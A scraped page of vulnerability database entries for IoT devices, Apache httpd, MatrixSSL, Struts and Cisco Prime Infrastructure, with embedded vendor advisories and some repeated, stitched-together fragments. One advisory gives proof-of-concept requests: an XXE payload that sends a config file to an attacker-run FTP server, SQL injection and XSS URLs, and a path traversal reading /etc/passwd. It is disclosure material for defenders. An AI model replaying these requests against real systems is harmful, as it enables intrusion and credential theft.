VARIoT IoT vulnerabilities database

dLAN 200 AVeasy is a network device in Germany that transforms the home power grid into a convenient data network. dLAN 200 AVeasy has an unauthorized access vulnerability that allows an attacker to bypass permission authentication, access sensitive directories or files, and obtain sensitive information.

Possible CRLF injection allowing HTTP response splitting attacks for sites which use mod_userdir. This issue was mitigated by changes made in 2.4.25 and 2.2.32 which prohibit CR or LF injection into the "Location" or other outbound header key or value. Fixed in Apache HTTP Server 2.4.25 (Affected 2.4.1-2.4.23). Fixed in Apache HTTP Server 2.2.32 (Affected 2.2.0-2.2.31). Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into having a false sense of trust

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is required to exploit this vulnerability.The specific flaw exists within the handling of the various txt_mac parameters provided to the config_wds.php management portal page. The issue lies in the failure to properly validate a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of root.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ARRIS VAP2500. Authentication is not required to exploit this vulnerability.The specific flaw exists within the authentication validation mechanism of the used in the list_mac_address.php management portal page. The issue lies in the failure to stop processing the page after an unsuccessful attempt to validate authentication. An attacker can leverage this vulnerability to execute code under the context of root.

In FortiClientWindows 5.4.1 and 5.4.2, an attacker may escalate privilege via a FortiClientNamedPipe vulnerability. fortinet's Windows for FortiClient contains vulnerabilities related to authorization, privileges, and access control.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Fortinet FortiClient is prone to a privilege-escalation vulnerability. An attacker can exploit this issue to execute arbitrary code with elevated privileges. FortiClient 5.4.1 and 5.4.2 are vulnerable. Fortinet FortiClient is a mobile terminal security solution developed by Fortinet. The solution provides IPsec and SSL encryption, WAN optimization, endpoint compliance, and two-factor authentication when connected to FortiGate firewall appliances

Wi-Fi driver of Honor 5C and P9 Lite Huawei smart phones with software versions earlier than NEM-L21C432B351 and versions earlier than VNS-L21C10B381 has a DoS vulnerability. An attacker may trick a user into installing a malicious application and the application can access invalid address of driver to crash the system. HuaweiHonor5C and P9Lite are both Huawei's smartphone products. Huawei's mobile Wi-Fi driver has a denial of service vulnerability. Huawei Smart Phones are prone to local denial-of-service vulnerability. Attackers can exploit this issue to crash the system, resulting in a denial-of-service condition

Hongfan iOffice system is based on Microsoft's .NET technology. It is a mobile information system based on portable terminals such as notebooks and mobile phones. There is a SQL injection vulnerability in the WSLoginMobile.asmx? wsdl parameter of the iOffice system. The vulnerability is caused by failure to effectively filter the data submitted by users, allowing attackers to use the vulnerability to obtain database sensitive information.

'/cgi-bin/admin/testserver.cgi' of the web service in most of the VIVOTEK Network Cameras is vulnerable to shell command injection, which allows remote attackers to execute any shell command as root via a crafted HTTP request. This vulnerability is already verified on VIVOTEK Network Camera IB8369/FD8164/FD816BA; most others have similar firmware that may be affected. An attack uses shell metacharacters in the senderemail parameter. VIVOTEKNetworkCameras IB8369, FD8164 and FD816BA are all network camera products of China VIVOTEK. A security vulnerability exists in the /cgi-bin/admin/testserver.cgi file for Web services in VIVOTEKNetworkCamerasIB8369, FD8164, and FD816BA

'/cgi-bin/admin/downloadMedias.cgi' of the web service in most of the VIVOTEK Network Cameras is vulnerable, which allows remote attackers to read any file on the camera's Linux filesystem via a crafted HTTP request containing ".." sequences. This vulnerability is already verified on VIVOTEK Network Camera IB8369/FD8164/FD816BA; most others have similar firmware that may be affected. VIVOTEKNetworkCameras IB8369, FD8164 and FD816BA are all network camera products of China VIVOTEK

An exploitable heap buffer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a buffer overflow on the heap resulting in remote code execution. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating secure connection. InsideSecure MatrixSSL Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which can implement TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions. MatrixSSL 3.8.7b is vulnerable; other versions may also be affected

An integer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a length counter to overflow, leading to a controlled out of bounds copy operation. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating secure connection. InsideSecure MatrixSSL Contains an integer overflow vulnerability.Information is obtained and service operation is interrupted (DoS) There is a possibility of being put into a state. Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which can implement TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. MatrixSSL 3.8.7b is vulnerable; other versions may also be affected

Privilege escalation vulnerability in Lenovo Nerve Center for Windows 10 on Desktop systems (Lenovo Nerve Center for notebook systems is not affected) that could allow an attacker with local privileges on a system to alter registry keys. LenovoY900 and other Lenovo are Lenovo's notebook products. NerveCenter for Windows 10 is one of the computer performance control software for Windows 10 systems. There is a local privilege elevation vulnerability in LenovoNerveCenter. An attacker could use this vulnerability to change the registration key

An exploitable heap buffer overflow vulnerability exists in the X509 certificate parsing functionality of InsideSecure MatrixSSL 3.8.7b. A specially crafted x509 certificate can cause a buffer overflow on the heap resulting in remote code execution. To trigger this vulnerability, a specially crafted x509 certificate must be presented to the vulnerable client or server application when initiating secure connection. InsideSecure MatrixSSL Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Inside Secure MatrixSSL is an IoT application toolkit from the French company Inside Secure, which can implement TLS and DTLS in a modular way. MatrixSSL is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will result in denial-of-service conditions. MatrixSSL 3.8.7b is vulnerable; other versions may also be affected

A vulnerability in the Cisco Prime Infrastructure (PI) and Evolved Programmable Network Manager (EPNM) SQL database interface could allow an authenticated, remote attacker to impact the confidentiality and integrity of the application by executing arbitrary SQL queries, aka SQL Injection. More Information: CSCvc23892 CSCvc35270 CSCvc35626 CSCvc35630 CSCvc49568. Known Affected Releases: 3.1(1) 2.0(4.0.45B). Vendors have confirmed this vulnerability Bug ID CSCvc23892 , CSCvc35270 , CSCvc35626 , CSCvc35630 , CSCvc49568 It is released as.Information may be obtained and information may be altered. An attacker can leverage this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue is tracked by Cisco Bug ID's CSCvc23892, CSCvc35270, CSCvc35626, CSCvc35630 and CSCvc49568. PI is a set of wireless management solutions through Cisco Prime LAN Management Solution (LMS) and Cisco Prime Network Control System (NCS) technologies; EPNM is a set of network management solutions. A remote attacker could exploit this vulnerability by sending URLs with malicious SQL statements to the affected application to affect the integrity and confidentiality of the application. SEC Consult Vulnerability Lab Security Advisory < 20170622-0 > ======================================================================= title: XML External Entity Injection (XXE), SQL Injection, Cross Site Scripting, Local File Disclosure product: Cisco Prime Infrastructure vulnerable version: 1.1 through 3.1.6 fixed version: 3.1.6 Update 1 (patch), 3.1.7 (future release) CVE number: CVE-2017-6662, CVE-2017-6698, CVE-2017-6699, CVE-2017-6700 impact: high homepage: http://www.cisco.com/c/en/us/products/cloud-systems-management/prime-infrastructure/index.html found: 2016-11-21 by: P. Morimoto (Office Bangkok) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Cisco Systems, Inc. (known as Cisco) is an American multinational technology conglomerate headquartered in San JosA(c), California, that develops, manufactures, and sells networking hardware, telecommunications equipment, and other high-technology services and products. Through its numerous acquired subsidiaries, such as OpenDNS, Cisco Meraki, and Cisco Jasper, Cisco specializes into specific tech markets, such as Internet of Things (IoT), domain security, and energy management." Source: https://en.wikipedia.org/wiki/Cisco_Systems Business recommendation: ------------------------ SEC Consult recommends to install the latest patch to fix the identified vulnerabilities. Furthermore, the Cisco Prime Infrastructure should be reachable only from trusted internal network and/or whitelisted IP addresses. Since SEC Consult only performed a short security crash test on this product it is highly recommended to perform a thorough security review as there are indications for further vulnerabilities. Vulnerability overview/description: ----------------------------------- SEC Consult was able to identify some serious vulnerabilities with the low privileged "monitor-only" user. 1) XML External Entity Injection (CVE-2017-6662) The used XML parser is resolving external XML entities which allows attackers to read files and send requests to systems on the internal network (e.g port scanning). The vulnerability can be exploited by a low privileged read-only user to read sensitive information files with malicious XML code. The hashed password of the local admin user can be accessed without authorization. 3) Cross site scripting (CVE-2017-6699, CVE-2017-6700) Due to the lack of input validation, an attacker can insert malicious JavaScript code to be executed under a victim's browser context. 4) Local File Disclosure (no CVE assigned) Because of insufficient input validation, arbitrary local files can be disclosed. Files that include passwords and other sensitive information can be accessed. Proof of concept: ----------------- 1) XML External Entity Injection (CVE-2017-6662) Login with a low privileged user and navigate to Settings > Export > select Format 'PDF' click 'Export'. Make sure the 'Chart' option is selected, this chart uses XML to build SVG images. POST /webacs/prime/ui/dashboard/renderer HTTP/1.1 Host: <CiscoPrimeHost> [...] output-type=pdf&content={"applicationName":"sectest","reportName":"Site","options":{},"timezoneOffset":0,"items":[{"options":{"filters":[],"additionalInfo":[""]},"svgSurface":{"svg":"<%3fxml+version%3d\"1.0\"+encoding%3d\"UTF-8\"%3f><!DOCTYPE x [<!ENTITY %25 foo SYSTEM \"http://<AttackerHost>:1234/sectest.dtd\">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]><svg+xmlns%3alink%3d\"http%3a//www.w3.org/1999/xlink\"+xmlns%3d\"http%3a//www.w3.org/2000/svg\"><defs/><text>%26%65%78%66%69%6c%3b</text></svg>","dims"%3a{"width"%3a0,"height"%3a0}},"csv"%3a"Devices,\"","title"%3a"","timestamp"%3a""}],"noBrandingData"%3atrue,"locale"%3a"en"}&pdfOptions=%7B%22table%22%3Atrue%2C%22chart%22%3Atrue%7D $ cat sectest.dtd <!ENTITY % data SYSTEM "file:///storedconfig/active/startup-config"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://<Attacker>:2121/%data;'>"> $ python -m SimpleHTTPServer 1234 $ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb $ ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.8.0_66@ > 230 more data please! < TYPE I > 230 more data please! < CWD ! > 230 more data please! < hostname <CiscoPrimeHost> [...] < ! > 230 more data please! < username admin password hash <AdminHashedPassword> > 230 more data please! < CWD role admin > 230 more data please! < ! [...] 2) SQL Injection (CVE-2017-6698) A low privileged user such as "monitor-only" user can read the admin's password hashes via SQL injection. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_RECENT_LINKS?categoryPath=global%2fPI_RECENT_LINKS<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/syslog_viewer_tutorial?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/device-rest/getfiltercriteria/device?start=0&count=100&id=<SQL-Injection>&path=%2Froot Some vulnerable entry points require administrator privileges to exploit. https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/PI_HOME_PAGE_SELECTION?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/corelated-right-tabs?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/wap/preference/value/@@me/DASHBOARD_CONFIG:com_cisco_xmp_web_page_smartlicense_dashboard?categoryPath=<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/userService/getAuditRecordsForGivenRange/?userName=/<SQL-Injection>&ipAddress=/<SQL-Injection>&time=/<SQL-Injection>&auditDescription=/<SQL-Injection>&userGroup=/<SQL-Injection>&activeDomain=/<SQL-Injection> https://<CiscoPrimeHost>/webacs/inventoryRestService/ifm/inventory-rest/getImportTaskStatusDTO/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getJobDetails/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobsCtr/Infrastructure/<SQL-Injection> https://<CiscoPrimeHost>/webacs/rs/json/jobSchedulerService/getAllJobs/<SQL-Injection>/Lightweight%20AP%20Operational%20Status Some URLs with this pattern are affected by the SQL injection vulnerability in the JSON field. https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.proxy/ (HTTP POST) { "items": [ "<SQL-Injection>", "ProxyPort", "ProxyUserName", "ProxyPassword", "isProxyEnabled", "isProxyAuthenticated" ] } https://<CiscoPrimeHost>/webacs/rs/preferences/systemPreferencesForNode/default.swim/ (HTTP POST) { "items": [ "<SQL-Injection>", "CCOPassword" ] } 3) Cross site scripting a) Reflected cross site scripting (CVE-2017-6699) https://<CiscoPrimeHost>/webacs/applications/common/jsp/SystemPreferences_Configurable.jsp?taskName=<img+src=x+onerror=alert(/XSS1/)>&confUrl=</ScR</ScRipT>ipT><img+src=x+onerror=alert(/XSS2/)> https://<CiscoPrimeHost>/webacs/applications/inventory/html/ImportJobResults.jsp?taskId=</sc</script>ript><img+src=x+onerror=alert(/XSS1/)>&jobResultPageId='><img+src=x+onerror=alert(/XSS2/)> b) DOM-based cross site scripting (CVE-2017-6700) https://<CiscoPrimeHost>/webacs/index_abs.jsp?theme=prime#pageId=com_cisco_ifm_ui_web_page_job_dashboard_import_view&taskId=<ExistingTaskID>&jobName="><img src=x onerror=alert(/XSS/)>&pageSettings= https://<CiscoPrimeHost>/webacs/loginAction.do?action=login&product=wcs&selectedCategory=en#pageId=com_cisco_ifm_ui_web_page_job_dashboard_detail_view&forceLoad=true&jobType=Infrastructure&workState=Scheduled&parentType=usrDefined&lastRunJobId=<ExistingJobId>&lastRunResultState=Success&jobId=<ExistingJobId>&jobName=Mobility Service Status&jobBreadcrumName="><img src=x onerror=alert(/XSS/)> 4) Local File Disclosure The attacker must be in the super users or admin group in order to exploit this vulnerability. https://<CiscoPrimeHost>/webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd GET /webacs/packetCaptureAction.do?command=download&filename=../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: <CiscoPrimeHost> [...] HTTP/1.1 200 OK Cache-Control: private Expires: Thu, 01 Jan 1970 01:00:00 CET Content-Disposition: attachement; filename="../../../../../../../../../../../../../../../../../../../../etc/passwd.zip" Content-Type: application/zip [...] $ unzip _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip Archive: _.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._.._etc_passwd.zip warning: skipped "../" path component(s) in ../../../../../../../../../../../../../../../../../../../../etc/passwd inflating: etc/passwd $ cat etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt [...] Vulnerable / tested versions: ----------------------------- According to information provided by Cisco, the following versions are affected: 1.1 through 3.1.6 SEC Consult tested the following versions which were the most recent ones at the time of discovery: * 3.1.0.0.70 * 3.1.0.0.132 incl. 3.1.4 patch Vendor contact timeline: ------------------------ 2016-11-23: Contacting vendor through psirt@cisco.com. 2016-11-23: Initial response from Cisco PSIRT. 2016-11-24: Additional vulnerabilities added. 2016-12-14: Cisco proposed target date for the fixes for March 2017. 2017-03-03: Cisco postponed target date for the fixes to 31 May 2017. 2017-05-16: Cisco postponed target date for the fixes to 21 June 2017. 2017-06-14: CVEs are assigned to the vulnerabilities. 2017-06-21: Patches available 2017-06-22: Coordinated release of security advisory. Solution: --------- Install the patch version 3.1.6 Update 1. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Pichaya Morimoto / @2017

In Apache httpd before 2.2.34 and 2.4.x before 2.4.27, the value placeholder in [Proxy-]Authorization headers of type 'Digest' was not initialized or reset before or between successive key=value assignments by mod_auth_digest. Providing an initial key with no '=' assignment could reflect the stale value of uninitialized pool memory used by the prior request, leading to leakage of potentially confidential information, and a segfault in other cases resulting in denial of service. A security vulnerability exists in Apache httpd versions prior to 2.2.34 and 2.4.x versions prior to 2.4.27. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: httpd24-httpd security update Advisory ID: RHSA-2017:2483-01 Product: Red Hat Software Collections Advisory URL: https://access.redhat.com/errata/RHSA-2017:2483 Issue date: 2017-08-16 CVE Names: CVE-2017-3167 CVE-2017-3169 CVE-2017-7659 CVE-2017-7668 CVE-2017-7679 CVE-2017-9788 ===================================================================== 1. Summary: An update for httpd24-httpd is now available for Red Hat Software Collections. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. 2. Relevant releases/architectures: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch, x86_64 Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 3. Description: The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server. Security Fix(es): * It was discovered that the httpd's mod_auth_digest module did not properly initialize memory before using it when processing certain headers related to digest authentication. A remote attacker could possibly use this flaw to disclose potentially sensitive information or cause httpd child process to crash by sending specially crafted requests to a server. (CVE-2017-9788) * It was discovered that the use of httpd's ap_get_basic_auth_pw() API function outside of the authentication phase could lead to authentication bypass. A remote attacker could possibly use this flaw to bypass required authentication if the API was used incorrectly by one of the modules used by httpd. (CVE-2017-3167) * A NULL pointer dereference flaw was found in the httpd's mod_ssl module. A remote attacker could use this flaw to cause an httpd child process to crash if another module used by httpd called a certain API function during the processing of an HTTPS request. (CVE-2017-3169) * A NULL pointer dereference flaw was found in the mod_http2 module of httpd. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP/2 request. (CVE-2017-7659) * A buffer over-read flaw was found in the httpd's ap_find_token() function. A remote attacker could use this flaw to cause httpd child process to crash via a specially crafted HTTP request. (CVE-2017-7668) * A buffer over-read flaw was found in the httpd's mod_mime module. A user permitted to modify httpd's MIME configuration could use this flaw to cause httpd child process to crash. (CVE-2017-7679) 4. Solution: For details on how to apply this update, which includes the changes described in this advisory, refer to: https://access.redhat.com/articles/11258 After installing the updated packages, the httpd daemon will be restarted automatically. 5. Bugs fixed (https://bugzilla.redhat.com/): 1463194 - CVE-2017-3167 httpd: ap_get_basic_auth_pw() authentication bypass 1463197 - CVE-2017-3169 httpd: mod_ssl NULL pointer dereference 1463199 - CVE-2017-7659 httpd: mod_http2 NULL pointer dereference 1463205 - CVE-2017-7668 httpd: ap_find_token() buffer overread 1463207 - CVE-2017-7679 httpd: mod_mime buffer overread 1470748 - CVE-2017-9788 httpd: Uninitialized memory reflection in mod_auth_digest 6. Package List: Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6): Source: httpd24-httpd-2.4.25-9.el6.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el6.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el6.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el6.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el6.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7): Source: httpd24-httpd-2.4.25-9.el7.1.src.rpm noarch: httpd24-httpd-manual-2.4.25-9.el7.1.noarch.rpm x86_64: httpd24-httpd-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-debuginfo-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-devel-2.4.25-9.el7.1.x86_64.rpm httpd24-httpd-tools-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ldap-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_proxy_html-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_session-2.4.25-9.el7.1.x86_64.rpm httpd24-mod_ssl-2.4.25-9.el7.1.x86_64.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/ 7. References: https://access.redhat.com/security/cve/CVE-2017-3167 https://access.redhat.com/security/cve/CVE-2017-3169 https://access.redhat.com/security/cve/CVE-2017-7659 https://access.redhat.com/security/cve/CVE-2017-7668 https://access.redhat.com/security/cve/CVE-2017-7679 https://access.redhat.com/security/cve/CVE-2017-9788 https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iD8DBQFZlNCpXlSAg2UNWIIRArzwAJwNfAuroR6X18rUh+zmjiMy5iBkdwCeJF6e 4v4GwWYC+5xG0xxXzTEQyAg= =UV+2 -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . This release provides an update to httpd and OpenSSL. The updates are documented in the Release Notes document linked to in the References. OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols, as well as a full-strength general-purpose cryptography library. This release of JBoss Enterprise Application Platform 6.4.18 Natives serves as a replacement of the JBoss Enterprise Application Platform 6.4.16 Natives and includes bug fixes which are documented in the Release Notes document linked to in the References. (CVE-2017-9788) * A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between TLS/SSL server and client if the communication used a DES/3DES based ciphersuite. Upstream acknowledges Karthikeyan Bhargavan (Inria) and GaA<<tan Leurent (Inria) as the original reporters of CVE-2016-2183. Bug Fix(es): * CRL checking of very large CRLs fails with OpenSSL 1.0.2 (BZ#1508880) * mod_cluster segfaults in process_info() due to wrongly generated assembler instruction movslq (BZ#1508884) * Corruption in nodestatsmem in multiple core dumps but in different functions of each core dump. (BZ#1508885) 4. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted. The JBoss server process must be restarted for the update to take effect. =========================================================================== Ubuntu Security Notice USN-3370-2 August 01, 2017 apache2 vulnerability =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 12.04 ESM Summary: Apache HTTP Server could be made to crash or leak sensitive information if it received specially crafted network traffic. Original advisory details: Robert Swiecki discovered that the Apache HTTP Server mod_auth_digest module incorrectly cleared values when processing certain requests. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 12.04 ESM: apache2.2-bin2.2.22-1ubuntu1.13 In general, a standard system update will make all the necessary changes. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience. An httpd module using this API function could consequently allow access that should have been denied. JIRA issues fixed (https://issues.jboss.org/): JBCS-329 - Unable to load large CRL openssl problem JBCS-337 - Errata for httpd 2.4.23 SP2 RHEL 6 7. 7.3) - ppc64, ppc64le, s390x, x86_64 3. (CVE-2017-7679) * A use-after-free flaw was found in the way httpd handled invalid and previously unregistered HTTP methods specified in the Limit directive used in an .htaccess file. (CVE-2017-9798) Red Hat would like to thank Hanno BAPck for reporting CVE-2017-9798. Apache Tomcat is a servlet container for the Java Servlet and JavaServer Pages (JSP) technologies. (CVE-2017-9788) * A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. (CVE-2017-12615) * A vulnerability was discovered in Tomcat where if a servlet context was configured with readonly=false and HTTP PUT requests were allowed, an attacker could upload a JSP file to that context and achieve code execution. The References section of this erratum contains a download link (you must log in to download the update)

The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads. Apache Struts 2 framework, versions 2.5 to 2.5.12, with REST plugin insecurely deserializes untrusted XML data. A remote, unauthenticated attacker can leverage this vulnerability to execute arbitrary code in the context of the Struts application. Apache Struts2 Contains a vulnerability that allows arbitrary code execution (S2-052) Exists. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Apache Struts is prone to a remote code-execution vulnerability. Failed exploit attempts will likely result in denial-of-service conditions. Apache Struts 2.1.2 through 2.3.33 and 2.5 through 2.5.12 are vulnerable

